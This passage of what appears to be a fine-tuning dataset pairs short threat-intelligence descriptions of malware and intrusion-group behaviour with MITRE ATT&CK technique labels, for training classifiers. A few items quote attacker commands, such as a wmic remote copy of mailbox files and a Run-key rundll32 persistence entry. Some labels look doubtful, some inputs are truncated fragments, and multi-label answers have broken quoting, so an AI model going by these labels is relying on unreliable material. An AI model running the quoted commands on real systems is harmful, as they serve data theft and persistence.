- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 kills and disables services by using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If running as administrator, installs itself as a new service named bmwappushservice to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The wormDll32 module attempts to identify servers and domain controllers in the network using NetServerEnum and LDAP queries."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT has been install via template injection through a malicious DLL embedded within a template RTF in a Word document."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can drop a mouse-logger that will take small screenshots around at each click and then send back to the server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to use multiple dynamically resolved API calls."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In green, functions from Keychaindump C&C communication Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using spear-phishing emails that contained malicious Amazon-themed documents, the group targeted an employee of an aerospace company in the Netherlands and a political journalist in Belgium."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis has used DNS tunneling for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used open-source C2 frameworks, including Covenant."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prikormka creates a directory, \"%USERPROFILE%\\AppData\\Local\\SKC\\\", which is used to store collected log files."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. This is essentially the WMI equivalent of a registry-based run key from a persistence perspective. The Stage 3 malware is by default set to run 'onidle' after 30 minutes"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sharpshooter has sent malicious attachments via emails to targets."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has gathered detailed knowledge of team structures within a target organization."
- },
- {
- "role": "assistant",
- "content": "T1591.004 - Identify Roles"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can disable Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb's loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore has used the \"ps\" command to list processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has created services on remote systems for execution purposes."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has exfiltrated files using web services."
- },
- {
- "role": "assistant",
- "content": "T1567 - Exfiltration Over Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While performing the analysis on the delivery documents using the .sct file AppLocker bypass, we noticed the C# payload was functionally similar to the original RogueRobin payload"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest invokes \"time\" call to check the system's time, executes a \"sleep\" command, invokes a second \"time\" call, and then compares the time difference between the two \"time\" calls and the amount of time the system slept to identify the sandbox."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has added a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may collect user account information by running \"net user /domain\" or a series of other commands on a victim."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use modules like \"Invoke-SessionGopher\" to extract private key and session information."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT enumerates the victim operating system and computer name during the initial infection."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is unknown what these domains may have been used for but based on the similarity of domain spoofing and sharing an IP, they are likely part of the adversary infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has used PowerShell to execute malicious commands and payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A second method consists to use the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tarrask may abuse the Windows schtasks command-line tool to create \"hidden\" scheduled tasks."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can encrypt and compress files using Gzip prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery', 'T1082 - System Information Discovery', 'T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 collected MAC addresses from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The downloader collects basic system information and sends it via an HTTP POST request to a hardcoded command and control (C&C) server (Figure 10"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\”vert” = “rundll32.exe c:\\windows\\temp\\pvcu.dll , Qszdez”."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can delete Windows Volume Shadow Copies using \"vssadmin\"."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of uploading and downloading files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter uses NtQuerySystemInformation to enumerate running processes"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has the ability to perform timestomping of files on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OceanSalt can delete files from the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The instance of Warzone we trapped has the ability to bypass UAC on the latest version of Windows 10. In this blog we’re going to talk about the XLS used as the attack vector and the UAC bypass technique used"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has harvested data from victim's e-mail including through execution of \"wmic /node: process call create \"cmd /c copy c:\\Users\\\\\\backup.pst c:\\windows\\temp\\backup.pst\" copy \"i:\\\\\\My Documents\\.pst\"\ncopy\"."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA uses cmd.exe to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs data exfiltration is accomplished through the following command-line command: from (- --).txt."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork encrypted the collected files' path with AES and then encoded them with base64."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves is capable of downloading a file from a specified URL."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can enumerate processes running on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects a malicious DLL into the IExplorer.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can enumerate the victim's desktop."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DNS Monitoring Bypass The malware modifies the system DNS resolvers and uses Google’s public DNS servers to avoid being detected by DNS monitoring tools"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used a scheduled task to execute a malicious file."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can record audio using any existing hardware recording devices."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used \"msiexec\" to download and execute malicious Windows Installer files."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has stolen domain credentials by dumping LSASS process memory with comsvcs.dll and from a Microsoft Active Directory Domain Controller using Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has called \"GetIpNetTable\" in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet can access the victim’s webcam to take pictures."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentContorlSet\\Control\\WMI\\Security."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is prepended to the encrypted and encoded message"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode ."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download additional files from URLs."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can download files and upgrade itself."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
